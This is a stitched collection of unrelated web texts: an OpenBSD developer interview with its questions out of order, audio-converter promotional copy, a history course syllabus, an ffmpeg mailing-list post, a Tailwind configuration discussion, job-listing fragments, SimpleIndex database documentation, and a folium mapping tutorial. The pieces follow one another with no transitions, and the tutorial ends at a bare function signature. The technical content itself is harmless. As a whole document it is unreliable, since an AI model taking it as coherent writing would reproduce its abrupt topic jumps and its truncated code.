I run OpenBSD on both my laptops and desktops; the work being done by jsg@, kettenis@ and matthieu@ means X works great on my hardware, and the porters do an amazing job keeping all the upper stacks updated and working, given so few developers and hours in the day. 6. Can you tell us about some OpenBSD-related areas you work on? I started sending patches in 2009/2010 or so for a bunch of small things, and then in 2010 I got a fancy new dual-core AMD laptop that "just worked" except for a lack of CPU frequency scaling. I started learning about the newer AMD hardware and reading fancy docs like the BKDG (BIOS and Kernel Developer's Guide), and finally had something that worked. I then emailed tech@ and developers that worked on similar parts of the tree, and eventually it was committed by claudio@. Lately? I've been working on my own things, but occasionally find time between slacking (..so much TV) to write mail or send a diff or two. 5. How did you become an OpenBSD developer? What do you think is required in order to join the OpenBSD project as a developer? I got a mail from deraadt@ one day asking for a master.passwd line almost out of the blue. I think showing an interest in working on something both individually and together with a team is important. 8. OpenBSD tends to lead in development best practices; does it work the other way around? Is there a process improvement the project started or aims to adopt from the outside world? I think the work on tame^Wpledge will be interesting; reviewing the diffs and commits has been a fascinating look at how programs are designed, but also at where improvements can be made. I also think that nicm@'s privsep/sandboxed file(1) deserves some more attention: file is a utility that people run against anything, often as root, indiscriminately. It shouldn't be able to open sockets or write to files. 9. It's been a long 20 years of amazing releases. What are you most proud of, and what would you like to revisit/redo?
To be a part of it, even in a minimal role, for some 10 of those years, and now almost 4 as a developer.
This pack includes every natively supported free encoder binary for use with the Converter foobar2000 component. >As no tagging software other than Amarok appeared to be available for WavPack files, …There are at least two I know of: MB Picard (which is where the TagLib plugins are from, btw) and Ex Falso. The binaries are conveniently installed into a subfolder of the foobar2000 installation folder. To join files together, select all the clips you wish to merge and choose "Merge Selected into One" from the context menu. With the help of this versatile online audio converter, you are free to listen to songs from online music sites such as Pandora Radio, MySpace, YouTube, and Yahoo at any time. iDealshare VideoGo, a WV converter, can quickly batch-convert WavPack .wv files to almost all popular audio formats on Mac or Windows. WavPack is a lossless compression type, meaning the compression takes place without data being discarded. Free Lossless Audio Codec, or FLAC for short, is an audio compression method. FLAC is an open-source codec. FLAC is the format recommended to those backing up a CD collection, because the sound quality remains high, whereas MP3 compression results in a deterioration compared with the original. MP3 is the most common format for storing audio: virtually any player on any platform can open MP3 files. The audio is compressed with loss of quality, but the loss is negligible for the typical listener, and the file size is usually smaller than that of the original files. Click "Add Files" to choose WV files and add them to the conversion list, then click "Convert" to convert WV files to MP3, WAV, FLAC, APE, WMA, OGG, AC3, or AIFF.
The converter also converts files to common formats such as WAV, AWB, AU, MMF, AAC, MP3, MP2, and MPA. It can convert CDA to OGG, DAT to AAC, OMA to M4R (iPhone ringtone), VOB to AC3, ULAW to WAV, SWF to M4A (MPEG-4 audio), and so on. The converter offers many helpful features. WV to FLAC conversion software converts WV files to FLAC while keeping ID3 tags. For example, it automatically normalizes the volume of WV and FLAC files so that all output files have the same volume; it can skip the first X milliseconds of a file when converting, convert only X milliseconds of a file, or join several files into one. You can edit presets, create new ones, or delete old ones. FLAC is an open, royalty-free coding format for lossless compression of digital audio. This converter is highly customizable, with flexible settings. It also lets you extract audio from CDs, YouTube, and most video formats. Supported output formats include MP3, WAV, M4R, M4B, OGG, FLAC, AMR, ALAC, AAC, and WMA. A preset editor is provided for each format to help you customize it to your taste. Free Studio supports 28 input audio formats, including MP3, FLAC, WAV, and WMA. WavPack, with the file extension .wv, is a free, open-source lossless audio compression format. Ask yourself what the perfect audio converter is for you. Easy to use? One with a built-in audio player and CD ripper? Supporting all audio formats? Usable from the command line? WavPack can compress (and restore) 8-, 16-, 24-, and 32-bit fixed-point, and 32-bit floating-point audio files in the WAV file format, when compared with FLAC.
To someone who does not understand audio, and to the naked ear, they are nearly identical. I tested this on my rig with the start of a Mozart track (the first 30 seconds), and there were some artifacts that were only slightly better represented in the WAV. Another method is to use a free tool called All2MP3, which can convert audio formats such as APE, MPC, FLAC, WV, OGG, WMA, AIFF, and WAV to MP3. Various audio formats exist, and each has its own unique features. Some preserve excellent sound quality, some can be played only on specific devices, some offer compact size, and others are so uncommon that you have no idea which programs can open them. To enjoy music stored in exotic formats that your media player does not support, you may want to install an audio converter that promises to convert the tracks to a supported format. The one thing you might need to be concerned about is whether your FLAC file has a higher-than-normal bit depth, like 24, 32, or 64 bits per sample, or an unusual multichannel configuration. CUE Splitter extracts audio tracks from Audio CD images into MP3 or WAV files based on the CUE sheet. Convert your audio file to MP3 in high quality with this free online MP3 converter. Once I opened the files in QuickTime and exported them as .aif they were fine, but this defeats the purpose of a batch converter.
- HIST 397-02W History Honors Tutorial - Instructor: Prof. Kyle B. Roberts (email@example.com) - Fall 2014 - T: 2:30 – 5 PM - Classroom: Piper Hall - Office: Crown Center 548 - Office hours: TBA The following texts can be found for rental or purchase at the University Bookstore in the Granada Center on Sheridan Road. Copies will also be placed on reserve in Cudahy Library. - Wayne C. Booth, Gregory G. Colomb, and Joseph M. Williams, The Craft of Research (3d ed.; 978-0226065663) Available online through Loyola. - William Strunk, Jr and E.B. White, The Elements of Style (3d ed.; 978-0205191581) - Michel-Rolph Trouillot, Silencing the Past: Power and the Production of History (978-0807043110) - Joan Tumblety, ed. Memory and History: Understanding Memory as Source and Subject (978-0415677127) Be prepared with readings and assignments as specified for each class session. If you do not hand in all the assigned preliminary work (bibliographies, notes, outlines) on time, your final paper grade (which is, in fact, your course grade) will be lowered by 2/3 grade (e.g. A to B+). If the first draft of your paper is not handed in on time, your final paper grade will automatically go down a whole grade (e.g. A to B). The same is true for the final draft. (If both come in late, your final paper grade [i.e. course grade] will go down by 2 whole grades, e.g. from A to C or B to D). If you hand in assignments or papers more than 2 days late, your final paper, no matter how good, won’t get more than a C. If you miss more than one class, your final grade will be lowered by 2/3 grade (e.g. from B to C+); if you miss more than 3 classes, your final grade will be lowered by a whole grade. If you have done more than one of these things, the penalty will be doubled or tripled. Organize your work-time accordingly! All papers should be written for this course. If you want to rework a paper that you wrote (or are in the process of writing) for another course, you must get special permission. 
If you do not get special permission, and if your professor discovers your deception, you will get an F in the course. Your “first draft” should be as close to final as you can make it. Work on its organization, style, and footnote form as much as its historical content. Read and re-read it before handing it in. You won’t get a real grade on the first draft, just lots of comments and suggestions. The final paper will be graded, and that will be your grade in the course. Consider a “significant paper” to be one about 20-25 pages long, not including footnotes/endnotes and bibliography. Margins should be 1″ all around; fonts should be Times New Roman 12 points, no smaller or larger. Be sure to double space, including box quotations. Whether a first or final draft, papers should be carefully proofread. Plagiarism will result in a final grade of F for the course as well as a letter, detailing the event, to be sent to the History Chair and the CAS Dean. I adopt the definition of plagiarism in Booth, p. 192, namely that you plagiarize when: - You quote, paraphrase, or summarize a source but fail to cite it. - You use ideas or methods from a source but fail to cite it. - You use the exact words of a source and you do cite it, but you fail to put those words in quotation marks or in a block quotation. - You paraphrase a source and cite it, but you use words so similar to those of the source that anyone can see that as you paraphrased, you followed the source word by word. To avoid plagiarism, take notes carefully, putting into quotation marks all real quotes and summarizing other things in your own words. This is very hard to do; if you don’t do it right, it is better to have all your notes in quotes. The worst thing is to change around a few words from your source, not put quotation marks, and use your note as if it is a real summary: you will likely copy it out as it is on your card, and what you will have is in fact plagiarism, for changing around a word, a phrase, etc.
is still plagiarism if it follows the thought sequence/pattern of the original. On the other hand, do not avoid plagiarism by making your paper a string of quotations: this produces a very bad, probably an F, paper, though it is not criminal. Nevertheless, do not let any of this prevent you from quoting your primary sources. As they are the “evidence” on which you build your case, you will want and need to quote them. Just put quotation marks around them (or set them as a box quotation) and follow the quote with a proper foot or endnote. Please be respectful and courteous of each other (and the instructor) at all times. In our search for truth, it is important to be able to ask tough questions and to suggest difficult answers on sensitive topics. Key to this is feeling comfortable, so please refrain from any behavior that would upset that balance. Students with learning disabilities should meet with the professor within the first two weeks of the semester to discuss the need for any special arrangements.
Using ffmpeg to halve frame rate richard22j at zoho.com Sun Apr 15 09:18:08 PDT 2018 A couple of years ago there were problems with HLS, and there was speculation that we might have 50 fps HVFhd and DVFhd as the only HD modes. At that time I wondered if it would be feasible to drop every other frame to reduce the frame rate to 25 fps. I thought that because of the H.264 delta encoding it would probably mean transcoding, and that it would be too slow. On a 42" screen, for the programmes that I usually watch, I cannot see any difference between an HD picture at 50 fps and one at 25 fps, so 50 fps for me is just a waste of bandwidth and storage space, and I have been looking at it again. The ffmpeg documentation at 5.5 Video Options says for -r: "As an output option, duplicate or drop input frames to achieve constant output frame rate fps." That would be very useful if it means there is no need for transcoding. I found this example. The command I used for the first suggestion, with re-encoding, was ffmpeg -i am.mp4 -vf "setpts=PTS" -r 25 am4.mp4 That worked and kept the audio. It was slow, taking about 1.5 times real time. Also, the bit rate at about 1.4 Mbit/s was only about two-thirds of what I was expecting, so it may have been more compressed than the original. I had first tried "setpts=0.5*PTS", but that produced a file which played at twice speed, and "setpts=2*PTS", which played at half speed. For the second example, without re-encoding, my commands were ffmpeg -i am.mp4 -c copy -f h264 am1.h264 ffmpeg -i am1.h264 -c copy -r 25 am2.mp4 There was no audio, although that can be added back later. It was quite quick, at about a fiftieth of real time. It did not achieve any reduction in file size or bit rate, and the frame rate remained at 50 fps, so the -r 25 had been ignored. I did get lots of error messages saying "pts has no value", so maybe I need to set that.
When I tried repeating the -vf parameter from the first command, it said: Filtergraph 'setpts=PTS' was defined for video output stream 0:0 but codec copy was selected. Filtering and streamcopy cannot be used together. The second example from the stackoverflow page placed the parameter -r 25 before -i. I tried that. There was no reduction in file size, but the duration was made twice as long and the file played at half speed. As I understand it, placing the parameter in that position made it an input option. Has anyone managed to get ffmpeg to halve the frame rate without re-encoding? Can it be applied to the raw .ts output?
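For what it's worth, dropping exactly every other frame does require re-encoding the video: with H.264's inter-frame prediction, most frames only decode relative to their neighbours, so stream copy cannot discard them. The usual way to express the frame drop is the select filter plus regenerated timestamps. A sketch, with filenames carried over from the commands above and the audio stream copied unchanged:

```shell
# Keep even-numbered frames only, rebuild timestamps for 25 fps output,
# and copy the audio stream as-is. Re-encoding the video is unavoidable.
ffmpeg -i am.mp4 \
       -vf "select='not(mod(n,2))',setpts=N/25/TB" \
       -r 25 -c:a copy am_25fps.mp4
```

Here n is the input frame index, so select keeps frames 0, 2, 4, …, and setpts=N/25/TB assigns each surviving frame a timestamp consistent with 25 fps, which avoids the "pts has no value" complaints.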
Update tailwind config Add the theme's content/*.htm files to the tailwind config. Why would we need to consider the Winter.Pages content when generating the styles? Why would we need to consider the Winter.Pages content when generating the styles? Well, a static page can define some content with Tailwind classes. Two use cases: Custom page fields: they can define dropdown fields with options related to Tailwind classes. padding: '': 'Default' 'py-0': '0' 'py-4': '4' 'py-8': '8' 'py-10': '10' 'py-12': '12' 'py-16': '16' 'py-20': '20' Blocks of the Winter Blocks plugin: https://github.com/wintercms/wn-blocks-plugin/blob/4ea3447ab924de737290aadc272888c8a4ed0810/blocks/image.block#L20-L24 and https://github.com/wintercms/wn-blocks-plugin/blob/4ea3447ab924de737290aadc272888c8a4ed0810/blocks/image.block#L27 Not forgetting that content can be generated from the backend of the site in CMS/Content. That's why I thought it would be useful to include this directory in the list of those considered by Tailwind by default. @damsfx if the layout provides a Tailwind CSS class for the pages plugin to use, then you need to include it in the layout in such a way that the CSS compiler can detect it. The same applies for blocks. Thus, just including blocks and layouts should trigger Tailwind to generate the necessary classes to support any actual content being rendered by those templates. @damsfx no worries, it took me a bit to figure out at first too. My point is that Tailwind will be able to pick up the need for w-full to be generated simply by the inclusion of the *.block files in the asset compilation step, rather than needing the content files themselves to be included at that point. When you include *.block, Tailwind will see the lines where those options are defined and treat them as an inclusion of that class that it needs to process (see https://github.com/wintercms/wn-blocks-plugin/blob/main/blocks/button_group.block#L27-L28).
That means that all you should have to do is include the blocks folders and the layout folders and you're good to go, unless for some reason you have a field that allows for arbitrary content from the user. In some cases, you may need to do a slight workaround in your block file; i.e. for the example of a custom Froala dropdown where those dropdown values are defined elsewhere in the project (whether that's the DB or perhaps in some JS somewhere), you could do the following: name: richtext form: fields: content: buttons: [myCustomFontButton] == {# Include the following classes used by the content -> myCustomFontButton setting py-0 py-2 py-4 ... // etc #} <div>{{ data.content | raw }}</div> Does that kind of make sense? Is there a better way that could be introduced or documented so it's easier to understand / implement? That means that all you should have to do is include the blocks folders and the layout folders and you're good to go; unless for some reason you have a field that allows for arbitrary content from the user. Indeed, I have fields of that type. I also have repeated field declarations for the static pages plugin that use dropdown fields to choose a value. Does that kind of make sense? Is there a better way that could be introduced or documented so it's easier to understand / implement? Yes, it makes sense! In my case, here are the paths that I systematically use in the Tailwind configuration: ./configs/**/*.yaml ./content/**/*.htm ./layouts/**/*.htm ./pages/**/*.htm ./partials/**/*.htm And now I add the blocks defined in the plugins or the theme. So I think we can close this PR. Sounds good, although I really would recommend not including your content folder, to force you to ensure that your setup handles the styles being included without having your content itself scanned for styles.
That way you get a more portable deployment that doesn't rely on all of the content being present in the repo when the build script is run.
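For reference, the resulting content globs could look something like this in tailwind.config.js. This is an illustrative sketch, not the actual config from the PR; the paths (especially the relative path to the Blocks plugin) depend on where the theme and plugin live in your install:

```javascript
// tailwind.config.js (theme root) — illustrative sketch
module.exports = {
  content: [
    // templates that reference Tailwind classes directly
    './layouts/**/*.htm',
    './pages/**/*.htm',
    './partials/**/*.htm',
    // YAML field definitions whose dropdown options list class names
    './configs/**/*.yaml',
    // block definitions: scanning these lets Tailwind see the classes
    // offered as field options, so the content folder itself can be skipped
    '../../plugins/winter/blocks/blocks/**/*.block',
  ],
};
```

With the *.block files scanned, classes like w-full that appear in block field options get generated without content/** ever being scanned, which keeps the build independent of the deployed content.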
...larger project of transport, carpooling and logistics services. This project will be the best in Canada with its innovative services. During this project's development, I viewed many websites of this kind of service that are missing several services available on our platform (financial management / marketplace + banking / accounting / online payments: PayPal ...at least one other language. - experience in web development with good knowledge of frameworks such as ExtJS, Zend Framework, Doctrine & Smarty - presentable record of building modular, reusable, and well-documented code - working knowledge of the Git version control system and its preferred development workflows - good organisational skills of time and ...

Overall, the design must not use any stock photos of people; the design must be about our product and its benefits and features, not random people images from stock photo websites. The new website must be implemented using Page Builder ([log in to view the URL]) in WordPress. The new website must use our current logo (logo pack attached) ...

responsive HTML pages of the website, and won't be released till all the pages are working fine on desktop and devices. 2) The second milestone is $150, which will include the CMS development phase and testing as well. * We don't pay advance payments. *** Website Summary *** - Homepage: rotating banners for the main products, certificates, history, services

Seeking an individual who has experience with WooZone, eCommerce, Yoast SEO, SEO data entry, web scraping, web development and WordPress, along with Amazon product search. My site currently needs specific products to be imported on a weekly to bi-weekly basis. This will be an Amazon affiliate website with a specific niche genre. The candidate will need

I need a webmaster who is also a developer to maintain websites I host on behalf of my clients on a monthly or bi-monthly basis.
I need someone who is willing to work for a fixed fee, to be paid once a month, and send reports to prove work has been performed. I have about 5 websites that need this. Need to be able to: • Make all necessary plugin updates

Logo for website design company, name "VG infotec". VG infotec works with website design and software development.

...Upwork, Guru, PPH, Freelancer, etc. The candidate should know how to write proposals for projects, set up a portfolio on these websites and get projects through them, and should be comfortable in client interaction. Should have prior experience in a software or web development company. Candidates should be dynamic enough to achieve our monthly or quarterly targets. Commission ...

maintain complex forms for mobile and desktop web apps, with a focus on performance. The incumbent's main duties will include modifying, creating and maintaining the existing websites/applications and integrating with third-party plugins for statistics. Attention to detail, clean coding standards, and best coding practices are required. Roles and responsibility: Looking for professional content crea...

Experience and skill: minimum 2 years' experience in web design and development, with skill in PHP and HTML 5. Use of frameworks such as Joomla and CodeIgniter with built-in security features. Ability to communicate fluently in English is an absolute necessity. Must be able to show similar websites that you have created.

...articles. One is for websites and the other one is to go in our newsletter to upsell our products to offices only using 1 or 2 of our products. Most of the research is done already. One will be on the benefits of using all our products vs using multiple pieces of software; the other would be top reasons to use purpose-built real estate websites with portal

I want a person who can find development projects from all over the world on websites such as Freelancer, Upwork, etc. and deliver them to the company. The freelancer should be fluent in English and professional.
...YOUR BIDS. IF YOU ARE PLACING YOUR BID BEFORE READING THE PROJECT, IT MEANS YOU ARE NOT PAYING ATTENTION TO SMALL DETAILS. This is the first phase of the project – development of social media sites. After this project is completed, the new project will hopefully be awarded to the same employee for ongoing monthly hosting and advertising services ...

information about our company: As part of a varied assessment process at Project Human Resources, we offer psychometric testing. It can be used in pre-employment screening, team development, conflict resolution and individual performance enhancement. Project Human Resources employs experts in the administration and interpretation of psychometric assessments ...

started growing out from a small development company determined to help businesses around New Zealand. About the role: an exciting and newly created role with no boundaries for great ideas. Have real autonomy and ownership of all things website design and development related. Key responsibilities: design and develop websites for small business and online

Require a Python developer to code a module which extracts all articles on a stock symbol from a series of websites for a given date range. The module is expected to extract data with different website names as input. The output is an Excel file which has the link of the article, the text data, and corresponding figures ...

Blockchain and AI. If you can design and develop an extraordinary website, you'll get the award + future projects for web design and development (1 eCommerce site immediately). We like the design of these websites, so that you can get an idea about our taste. However, it does not have to be similar, but it SHOULD amaze us! [log in to view the URL]
Back to Settings Wizard

The Database page lets you configure a database to export index data and images. You can also use a database to search and view existing files. Configuration of the database settings is similar to the Job Options screen. Index field mappings have been moved to the index field wizard. Use this screen to configure the data source connection, target table and special fields.

Database Design Overview

This overview will help you understand the overall database configuration scheme. The sections that follow give detailed descriptions of how to configure each setting on the database page. The database interface in SimpleIndex was designed to interact at a low level with any database, providing a wide variety of new functionality for a multi-user environment. Most document capture software comes with its own internal database that is used to manage scanned batches and index values until they are exported. SimpleIndex saves index data directly to fields in your database, giving you instant access to new images as they are being processed. This also allows SimpleIndex to work directly with custom database programs without any custom programming.

- When images are scanned, records must be "inserted" into the database to store the image file location and pre-indexed data.
- Manual indexing is done by retrieving a batch of records on another workstation and "updating" them with the correct index data.
- Users may view scanned images by "retrieving" them from the database based on index criteria and viewing the matching documents.
- Existing database records can be updated in batches, linking files and updating index fields automatically.

Processing stages can be tracked using the Revision Level field. This field keeps track of how many times a document has been processed (scanning, indexing, double-key verification, QC review, etc.) as well as who is currently working on a document.
SimpleIndex assumes the database is configured to have a single table or view that contains all the index fields and a field to store the path to the image file. See Database Mode.

Table or View

SimpleIndex is designed to store index information and the path to the image files in a single table or query. Select a table or query that will store this information here. To use SimpleIndex in Insert Mode, the table or query must have a primary key that is generated automatically (Autonumber, GUID, etc.). Use the Load button after you have entered the name of your table to load the field selectors with a list of the available fields from that table. It is possible to use a query (also called a view) that allows you to store index information and image data in separate tables. Depending on the database type, there are constraints on the field relationships necessary to create a query that supports inserting and updating. Please ensure your query is updatable before using it with SimpleIndex. Consult your database documentation for more information on creating updatable queries.

Output File Field

The Output File Field is used to store the path to the image file corresponding to the current record. It is recommended that you use the relative path instead of the full path to store the image filename. Doing this allows you to move the images to another storage server without having to perform a complex update on this field to reflect the change. Uncheck the Output full path to exported files option to store the relative path, leaving off the Output folder. If the images move, you only need to enter the new path in the Input and Output folders of your SimpleIndex configuration files to make your document management system work in the new location.

File Type Field

This field stores the file extension for each file.
It is designed to be used when storing files as binary objects, to allow SimpleIndex to determine what type of file the data represents so it can be displayed in the correct viewer.

Rename Files in Update Mode

This option will cause saved images in Update mode to be moved from the Input folder to the Output folder, and renamed using the subfolder and filename determined by the Index settings. This makes it possible to do a variety of 2-stage indexing processes. Some examples are:

- Scan and create multi-page files with separator sheets, then index and rename those files with Update mode.
- Use scheduled OCR to automatically index fields and Update mode to correct OCR mistakes and move files to their destination.
- Keep files in a temporary location during processing and move them to a production server once indexing is complete.

Skip Insert if Output File Exists

When you scan using the same configuration with the same index values, images are appended to the existing files. In most cases, you do not want another record created in the database for the same file. Check this box to prevent these duplicate records from being created.

Store Files as Binary Objects

Check this option to store the file data in the database field defined in the Output File Field instead of the default behavior, which is to save the path to the external file in this field. This allows all data to be stored within the database server without the need for separate files on the network. Use the File Type Field setting to indicate the file type for documents stored in the database. In Retrieval and Update modes, this is used to determine the proper viewer to display the file in.

Remove Local Copy After Export

Uncheck this option to keep a copy of the exported files in the Output folder after they have been saved to the database as a binary object.

Revision Field

The Revision Field is used to indicate different queues that can be used for different types of processing.
In Insert mode, the Revision Level value you enter is stored in the selected field. In Update mode, the user retrieves only images that match the selected Revision Level, and this value is incremented by 1 whenever the user saves an index value using the Save Index button. By incrementing the value of the Revision Level, it is possible to tell which stage of processing each image is in. Typically, scanners will insert records with a Revision Level of 0. Indexers then update these records with the field information and increment the level to 1. Double-key indexers or QC reviewers finally update the level to 2, indicating that processing is complete. Database stored procedures may then be implemented to move records with a level of 2 to a table on a production server if necessary.

IMPORTANT! The Revision Field must be defined as a text/varchar data type and not an Integer! When used in Update mode, SimpleIndex "checks out" each batch to the current user by setting the Revision Field temporarily to the user's ID, preventing the records from showing up in another user's batches. For this reason, the Revision Field must be a multi-character data type with sufficient length to store the User ID.

Full Text OCR Field

This will associate the image file and index information with the text of the document inside your database, making full-text search possible.

Page Count Field

If using Insert mode, this setting allows you to specify the name of a number field to use to store the page count for each file.

Sort By Field

Data Source Configuration Wizard

See Data Source

Database Settings Training Video

Video was recorded in a previous version of SimpleIndex. Refer to the wiki documentation for the latest updates.

Related Knowledge Base Articles

- Database Export Error
- Using alternate database schemas
- How do I set up SimpleIndex to use a database table field as a list file when the table is not the same as the table I am using on the Database tab?
- Is it possible for index values to be keyed twice to ensure accuracy (double-key verification)?
- Is it possible to have the scanned image itself added to a database and not just the image path?
- When exporting to a database, I get the error "Multi-step operation generated errors"
- How do you configure full text searching in Retrieval mode?
- How do I connect to an SQL Server database?
- How do I connect to an existing Access database?
- I know nothing about databases. Can I still use the database and Retrieval Mode features?

Next Step: Indexing & File Naming
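The insert / check-out / update flow described in the Revision Field section above can be sketched with a throwaway SQLite table. The table and column names here are invented for illustration; SimpleIndex itself works against whatever schema you configure:

```python
import sqlite3

# Hypothetical single-table layout mirroring the scheme above: index fields,
# a relative path to the image, and a text-typed Revision field.
conn = sqlite3.connect(":memory:")
conn.execute("""
    CREATE TABLE documents (
        doc_id   INTEGER PRIMARY KEY AUTOINCREMENT,  -- auto-generated key, needed for Insert mode
        customer TEXT,                               -- an example index field
        img_path TEXT,                               -- relative path, so the image root can move
        revision TEXT                                -- text type: temporarily holds a user ID at check-out
    )""")

# Stage 0: the scanning station inserts one record per file
conn.execute("INSERT INTO documents (img_path, revision) VALUES (?, ?)",
             ("batch01/0001.tif", "0"))

# Check-out: an indexing station claims level-0 records by writing its user ID,
# hiding them from other users' batches
conn.execute("UPDATE documents SET revision = ? WHERE revision = ?", ("jsmith", "0"))

# Save: the indexer fills in the fields and promotes the record to level 1
conn.execute("UPDATE documents SET customer = ?, revision = ? WHERE revision = ?",
             ("ACME Corp", "1", "jsmith"))

row = conn.execute("SELECT customer, revision FROM documents").fetchone()
print(row)  # prints ('ACME Corp', '1')
```

The text-typed revision column is what makes the temporary check-out trick possible: the same field alternates between holding a numeric stage ("0", "1", "2") and a user ID.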
Mapping renewable power plants in Argentina — Dynamic SVG marker creation in folium

While going through some Kaggle exercises on data analysis, I found out about the folium library. It is quite an interesting tool, allowing you to add layers to existing open-source maps and display them as HTML. I decided to create a map to show some data from my country. I found a dataset that contains data about every renewable energy project that the country manages. Sadly, this means that shared projects such as Yacyretá, managed by Argentina and Paraguay, are not present in the dataset. The dataset is available here. I used Python and the folium library to show the data. Folium generates code for Leaflet, an excellent JavaScript mapping library. A Jupyter notebook with the code is available in my repository, here.

The dataset contains many columns, but I used only the following ones:

- Proyecto: name of the project.
- Tecnologia: the type of power plant, classified by source: for example biomass, wind, solar, etc.
- Potencia_mw: the amount of power that each plant produces or will produce, in megawatts.
- Latitude, longitude: latitude and longitude of the plant.
- Avance: a numerical column in the range 0–1 that tells us the percentage of completion of the project. 1 means a working, operative plant; 0.5 would mean that only half of the plant has been built.

The dataset has 282 rows, but I will be using only the plants with more than 0 percent completion. This data is not complete. It only includes some plants that are part of a programme called "Renovar" that was active a few years ago. In fact, many of the plants shown on the map as "in construction" are not in active construction right now.

I decided to show the different types of plants using different colors. The amount of power and the name of the plant are shown in a popup when clicking on a marker. A MarkerCluster groups markers that are close together when the map is seen at a low zoom level.
This results in a map that has little clutter on it. Something in the last picture may have caught your eye: why do we have that Pac-Man shaped marker? That is the way I chose to showcase plants that are not fully finished: a partial circle. If a plant is only 25% finished, only 25% of the circle will be shown.

Many tutorials go through the main stages of creating a map in folium. I will instead focus on the slightly more complex issues that arise when trying to build personalized maps. If you have never used folium, I can recommend the documentation. It is a very good starting point.

After plotting your data, you will usually have a set of layers. Every layer will have been added to the map, and every data point will be part of a layer. For this project, I have used MarkerClusters as layers, combining layering and clustering. MarkerClusters behave like layers in every regard and add extra functionality. I trust that you will manage this part with no complications, and if they arise, there are good resources online on how to handle them.

The complex part for me started when I wanted custom markers that would differ depending on the data. The goal for the markers was to show the completeness of each project with partial circles. One approach, of course, would be to pre-render 100 partial circles with different levels of completeness. This approach is not as bad as it may seem: these images would be fairly small, and you could pick them from an array and use them. However, I didn't do this. I wanted to create the marker dynamically.

Folium allows you to use HTML to create a marker. This is a good start. You can make circles using just HTML, creating a div and playing with its border-radius. Googling a bit will also reveal various amounts of dark magic that would let you build many different shapes using just HTML and CSS. Instead, I decided to use SVG.
It stands for Scalable Vector Graphics and, as its name implies, it defines an image using vectors instead of pixels. This means that as long as you can represent your figure through some type of mathematical operation, you will be able to create a function that gives you your desired figure. To understand how SVG works, I recommend this tutorial at w3schools. SVG has predefined operations as HTML-like tags. For example, you can make a circle like this:

<svg width="100" height="100"> <circle cx="50" cy="50" r="40" stroke="black" stroke-width="1"/> </svg>

This gets us closer to the solution. SVG does have many tags to create different basic shapes. Sadly, you will soon find that to build complex images, you will need to combine the simpler tools. What is needed is a Path. It allows you to use basic shapes in succession to create your figure. The w3schools link should help you get acquainted with the available shapes and how to represent them in SVG notation. This is the part where it gets a little daunting. This tool helps a lot in visualizing the results.

Making a circle section only required three SVG operations: Move, Line, and Arc. Let's describe them (note that in SVG path syntax, lowercase commands are relative to the current position and uppercase commands are absolute; the descriptions below use the relative forms):

- Move X Y: this will move the "SVG pointer" to the desired position, relative to the current position.
- Line X Y: it will draw a line from wherever your pointer is to the position (X, Y), relative to your position.

Before jumping to the Arc, let us see some examples of these two operations. This screenshot comes from the tool I recommended for SVG paths. In this path, we moved to the position (10, 10), and from there, we drew a line 10 pixels down and 20 pixels to the right. Every operator receives a position that is relative to the position of the pointer. The pointer starts at (0, 0), the top left corner of the image. A final example uses the Line operator again. In the end, I used the Z operator, which draws a line back to the first position where something was drawn on the screen.
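Since the screenshots do not reproduce here, this is a plain-text version of that kind of path. The first two commands match the example described above; the extra line and the exact coordinates are just illustrative:

```svg
<svg width="100" height="100" xmlns="http://www.w3.org/2000/svg">
  <!-- m: relative move to (10,10); l: line 20 right and 10 down;
       a second relative line; Z: close the path back to the start -->
  <path d="m 10 10 l 20 10 l -10 15 Z" stroke="black" fill="none"/>
</svg>
```

Pasting this into the SVG path visualizer mentioned above shows the small closed triangle the three commands trace out.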
Now that we are more at ease with SVG (it took me more than just making a triangle to understand it, so I would totally understand if you want to stay here and play a bit with the other operators), we will jump to the Arc operator:

Arc radius_x, radius_y, x_axis_rotation, large_arc, direction, final_x, final_y

Let's process this one parameter at a time. Before we start, I will place this image showing the parts of an ellipse, as a quick reference:

Radius_x defines, assuming an ellipse such as the one in the image, the distance between the center and the vertex. Radius_y is the distance between the center and the co-vertex. If these two values are equal, we will have part of a circle. If not, we will have a section of the border of an ellipse. Final_x and final_y define the position of a point that belongs to the ellipse. Another point is given by the starting position of the SVG pointer. Having a start, an end, and the two radii, there are 4 possible arcs. This image will help us understand the next two parameters. If large_arc is 0, the shorter of the two possible arcs between the points is drawn; if it is 1, the longer one, farther away from the central point, is used. The direction flag will draw the arc either clockwise or counterclockwise. Finally, the x_axis_rotation value will rotate the vertexes of the ellipse.

Now that we know how to use Move, Line and Arc, how do we use them to create our special marker? The goal is, starting with a number that goes from 0 to 1, to have something like this:

Before executing the Arc, we need to move the pointer to the center of the circular section and create a vertical line. Then, we need a circular arc. Radius_x and radius_y will always be equal. No need to use x_axis_rotation either. The direction will always be clockwise. So we will only be interested in final_x, final_y, and large_arc. Things do look simpler now, don't they?
Going from a value in [0, 1] to an angle in degrees is the first step: 100% completion is 360º; 50% completion, 0.5, would be 180º; and so on. Then, to get (x, y) coordinates, we convert our angle to Cartesian coordinates with a fixed norm, called radius in the function below. We need to keep track of the starting point, because we don't calculate the (x, y) position based on the current SVG pointer but on the center of the circle section. The following graph shows this. We can now define a function to make the whole SVG path.

Some experimenting led me to realize that if the angle goes above 180º, you will need the large_arc flag to be 1. In hindsight, this is because whenever you go farther than 180 degrees, the center of the arc, transported to the ellipse on which the operation is based, would have to be closer to the vertex being drawn.

Now we can add our SVG to the markers. A marker in folium has many attributes. Location is mandatory. Popup will, as its name indicates, give us a small popup when we click on the marker. Icon is the one we have been working towards: here we pass a DivIcon instance, which can receive HTML as a parameter. Inside a div, we pass an SVG tag with the path that our function describeArc gives us.

Some of the errors I made while going through this:

- Not adding width and height to the SVG tag. This had the effect of making every marker 350x100. Although it did not change the visual size of the SVG, it did change the clickable area of the marker, and thus it was rather uncomfortable to use the map.
- Not checking the correctness of the HTML code: the code will run even if the HTML is lacking a closing bracket or a quotation mark or whatever other problem you can imagine. Your mileage in resulting icons may vary a lot.

The actual project includes multilevel layering using MarkerCluster and subselectors. The map was exported to HTML and added to my personal website.
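The original code snippets did not survive the copy, so here is a minimal Python sketch of what the two functions described above might look like. The names polar_to_cartesian and describe_arc, the absolute-coordinate M/L/A commands, and the two-decimal formatting are my own choices; the article's actual code may differ:

```python
import math

def polar_to_cartesian(cx, cy, radius, angle_deg):
    # Angle 0 points straight up (12 o'clock); positive angles go clockwise.
    a = math.radians(angle_deg - 90)
    return cx + radius * math.cos(a), cy + radius * math.sin(a)

def describe_arc(cx, cy, radius, completeness):
    """Return an SVG path 'd' string for a pie slice covering
    `completeness` (0-1) of a circle centred on (cx, cy)."""
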